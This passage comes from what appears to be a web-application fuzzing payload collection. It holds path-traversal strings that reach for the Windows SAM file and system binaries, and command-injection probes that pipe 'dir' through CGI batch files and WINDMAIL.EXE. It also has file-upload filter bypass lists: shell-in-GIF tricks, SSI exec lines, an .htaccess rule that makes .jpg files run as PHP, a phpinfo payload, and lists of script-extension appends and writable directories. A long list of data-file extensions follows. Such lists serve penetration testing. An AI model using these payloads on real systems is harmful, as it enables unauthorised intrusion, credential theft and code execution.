ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
